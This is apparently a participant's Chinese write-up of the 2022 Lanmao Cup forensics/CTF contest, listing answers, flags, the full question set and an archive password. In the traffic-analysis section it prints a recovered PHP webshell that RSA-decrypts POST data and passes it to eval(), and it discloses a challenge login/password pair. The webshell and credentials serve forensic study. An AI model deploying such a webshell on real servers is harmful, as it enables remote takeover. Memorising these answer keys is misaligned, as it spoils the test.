文末附取证附件、题目、解压密码

电子取证

手机取证_1

手机取证_2

去看了蓝信的视频，在info.plist

然后+8

2022-01-11 18:47:38

exe分析_1

密码virus，然后开始面向微步做题

C:\Program Files\Common Files\Services\WmiApSvr.exe

exe分析_2

直接搜看看有没有

exe分析_3

svchost.exe

exe分析_4

挖矿

exe分析_5

win7显示的不对，win10那里看

韩国

apk分析_01

hhh，题目问EXEC结果要交红星的

apk分析_02

解base得到https://ansjk.ecxeio.xyz

答案：ansjk.ecxeio.xyz

apk分析_05

和初赛一个附件。不用说了

apk分析_06

直接搜关键词“安全”出答案

apk分析_07

猜的，4和3。答案3，本界面、广告界面、旁边的那个跳转界面。一共3个

apk分析_08

搜com.

apk分析_09

info.plist

d395159c291c627c9d4ff9139bf8f0a700b98732

apk分析_10

info.plist

全选

apk分析_11

www.nansjy.com.cn:8161

apk分析_12

com.example.weisitas526sad.activity.SplashActivity

apk分析_14

哈哈哈哈哈哈哈哈哈哈哈哈哈哈结束之前猜的红星

答案：红星

apk分析_15

即可找到明文username和md5加密后的password

17317289056/b12345678b

服务器取证_05

猜了5不对，猜6对了

Re

babynim

追到NimMainModule()

对比flag格式

取36位。

追进去

是个做乘法的操作，input * a = b

那么b // a == flag

print(51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801//56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471)
#923973256239481267349126498121231231
1
2

flag{923973256239481267349126498121231231}

Misc

神秘的日志

与ntlm有关的事件id 6038

交了五六十个，最后居然是成功后的第一次登录

直接麻了

system里

时间对应security第一次的登录时间

flag{dafd0428f634aefd1ddb26f8257c791f}

加密的通道

流量包，能发现传输hex之后多了个rsa.php，因此那串hex就是rsa.php，使用cyberchef给dump下来

Www.PHPJiaMi.Com

当时还以为是后面错误所以乱码了，看来不是

官方没有解密的

https://m.php.cn/blog/detail/20670.html

https://blog.csdn.net/qq292913477/article/details/88726944

使用第二个链接的脚本解，得到以下

$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
echo $pk;
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
}
}
eval($cmd); 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

em，后面传输了rsa的参数，将最后的eval改成echo，cmd直接改成参数。发现一共传了三个参，其中第一个是蚁剑的，第二个就是传输的东西。发现第4次出现的rsa.php最大

第二条

$cmd = "yLxWGRCHJBEhtpnW7XTEjZa8U06pkFvEqTea5ISI/LggnmMXPblFZ6sDNJHoym6I0CkQIYr62+8sauFSYOHtPEpFX62kBmMAxi7abHOzQl5FAf2VO5wiezcXRp5nLDfqHCLa0Y8T9kaplu81yXLzXtlhZYgrqMtDsFROJ+ZKNN0=";
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
echo $pk;
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
}
}
echo($cmd); 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

熟悉的Zmxh

flag{844dfc86da23a4d5283907efaf9791ad}

取证附件、题目、解压密码

2022蓝帽杯取证题目+解压密码+附件
链接：https://pan.baidu.com/s/1AS0wVdjZxt46zaDcDzxdaQ
提取码：scpc
–来自百度网盘超级会员V4的分享

解压密码7(G?fu9A8sdgfMsfsdrfE4q6#cf7af0fc1c

手机取证_1
iPhone手机的iBoot固件版本号:（答案参考格式：iBoot-1.1.1）

手机取证_2
该手机制作完备份UTC+8的时间（非提取时间）:（答案参考格式：2000-01-01 00:00:00）

exe分析_1
文件services.exe创建可执行文件的路径是:（答案参考格式：C:\Windows.exe）

exe分析_2
文件HackTool.FlyStudio.acz_unpack.exe是否调用了advapi32.dll动态函式链接库？
（是/否）

exe分析_3
文件aspnet_wp.v.exe执行后的启动的进程是什么:（答案参考格式：qax.exe）

exe分析_4
文件[4085034a23cccebefd374e4a77aea4f1]是什么类型的木马:（答案参考格式：勒索）

exe分析_5
文件[4085034a23cccebefd374e4a77aea4f1]网络连接的IP地址的归属地是哪个国家:（答案参考格式：美国）

APK分析_01
受害人手机中exec的序列号是:（答案参考格式：0xadc）

APK分析_02
受害人手机中exec关联服务器地址是:（答案参考格式：asd.as.d）

APK分析_03
受害人手机中exec加载服务器的函数是:（答案参考格式：asda）

APK分析_04
受害人手机中exec的打包ID是:（答案参考格式：adb.adb.cn）

APK分析_05
受害人手机中exec的是否有安全检测行为？
是/否

APK分析_06
受害人手机中exec的检测方法的完整路径和方法名是:（答案参考格式：a.a.a()）

APK分析_07
受害人手机中exec有几个界面:（答案参考格式：2）

APK分析_08
受害人手机中红星IPA的包名是:（答案参考格式：a.s.d）

APK分析_09
受害人手机中红星IPA的APIKEY是:（答案参考格式：asd）

APK分析_10
受害人手机中红星IPA的权限有哪些？
[ 多选 ] 相册|定位|摄像头|麦克风

APK分析_11
嫌疑人手机中红星APK的服务器地址是:（答案参考格式：ass.a.d:11）

APK分析_12
嫌疑人手机中红星APK的程序入口是:（答案参考格式：a.v.b.n）

APK分析_13
嫌疑人手机中分析聊天工具，服务器的登录端口是:（答案参考格式：12）

APK分析_14
嫌疑人手机中分析聊天工具，用户归属的机构是:（答案参考格式：太阳）

APK分析_15
结合手机流量分析聊天工具的登录账号和密码是:（答案参考格式：1212311/12312asd）

服务器取证_01
服务器在启动时设置了运行时间同步脚本，请写出脚本内第二行内容。（答案参考格式：/abcd/tmp www.windows.com）

服务器取证_02
服务器在计划任务添加了备份数据库脚本，请写出该脚本的第二行内容。（答案参考格式：2022年第六届蓝帽杯）

服务器取证_03
使用宝塔linux面板的密码加密方式对字符串lanmaobei进行加密，写出加密结果。（答案参考格式：e10adc3949ba59abbe56e057f20f883e）

服务器取证_04
写出服务器中第一次登录宝塔面板的时间。（答案参考格式：2022-02-02 02:02:02）

服务器取证_05
写出宝塔面板的软件商店中已安装软件的个数（答案参考格式：2）

服务器取证_06
写出涉案网站（维斯塔斯）的运行目录路径。（答案参考格式：/root/etc/sssh/html）

服务器取证_07
写出最早访问涉案网站后台的IP地址。（答案参考格式：111.111.111.111）

服务器取证_08
写出涉案网站（维斯塔斯）的“系统版本”号。（答案参考格式：6.6.6666）

服务器取证_09
分析涉案网站的会员层级深度，写出最底层会员是多少层。（答案参考格式：66）

服务器取证_10
请写出存放网站会员等级变化制度的网站代码文件的SHA256值。（答案参考格式： 8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92）

服务器取证_11
计算向网站中累计充值最多的五名会员，获得的下线收益总和(不包含平台赠送)。（答案参考格式：666.66）

服务器取证_12
统计涉案网站中余额大于0且银行卡开户行归属于四川省的潜在受害人数量。（答案参考格式：6）

服务器取证_13
统计平台从成立之初至“2021-07-01 23:59:59”共收益多少金额(不包含平台赠送)。（答案参考格式：6666.66）

服务器取证_14
统计涉案网站哪一天登录的会员人数最多。（答案参考格式：1999-09-09）

服务器取证_15
写出涉案网站中给客服发送“你好，怎么充值”的用户的fusername值。（答案参考格式：lanmaobei666）